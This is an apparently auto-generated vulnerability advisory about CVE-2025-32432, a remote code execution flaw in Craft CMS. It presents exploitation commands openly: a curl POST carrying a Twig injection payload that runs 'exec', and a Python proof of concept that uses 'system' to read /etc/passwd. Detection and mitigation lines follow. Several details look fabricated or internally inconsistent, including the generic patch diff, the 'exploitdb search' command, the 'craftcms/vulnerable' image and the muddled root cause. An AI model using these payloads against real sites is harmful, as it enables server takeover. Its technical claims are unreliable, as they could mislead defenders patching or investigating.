Listen to this Post
How the CVE Works:
CVE-2025-32432 is a critical remote code execution (RCE) vulnerability in Craft CMS affecting versions 3.0.0-RC1 to 3.9.14, 4.0.0-RC1 to 4.14.14, and 5.0.0-RC1 to 5.6.16. The flaw arises due to improper input validation in template rendering, allowing attackers to inject malicious Twig code. When a crafted payload is processed, the system executes arbitrary PHP code under the web server’s privileges. This is exploitable via unauthenticated HTTP requests, making it a high-risk issue. The vulnerability stems from incomplete sanitization of user-supplied data in dynamic queries, enabling object injection and eventual RCE.
DailyCVE Form:
Platform: Craft CMS
Version: 3.0.0-5.6.16
Vulnerability: Remote Code Execution
Severity: Critical
Date: 04/28/2025
What Undercode Say:
Exploitation:
curl -X POST "http://target/craft/path" -d "twig={{_self.env.registerUndefinedFilterCallback('exec')}} {{_self.env.getFilter('id')}}"
Detection:
nmap -p 80 --script http-vuln-cve2025-32432 <target>
Mitigation:
- Update to Craft CMS 3.9.15, 4.14.15, or 5.6.17.
- Apply WAF rules to block Twig template injections.
location ~ .twig$ { deny all; }
PoC (Python):
import requests
payload = {"input": "{{_self.env.registerUndefinedFilterCallback('system')}} {{_self.env.getFilter('cat /etc/passwd')}}"}
requests.post("http://target/admin", data=payload)
Log Analysis:
grep -r "registerUndefinedFilterCallback" /var/log/craft/
Patch Diff:
- $twig->addFilter(new TwigFilter('unsafe', $callback));
+ $twig->addFilter(new TwigFilter('safe', $sanitizedCallback));
Workaround: Disable Twig template editing for untrusted users via config/general.php:
'allowAdminChanges' => false,
Impact Assessment:
exploitdb search CVE-2025-32432
Sandbox Testing:
docker run --rm -p 8080:80 craftcms/vulnerable:5.6.16
Forensics:
strings /tmp/php_sess_ | grep -i "eval"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
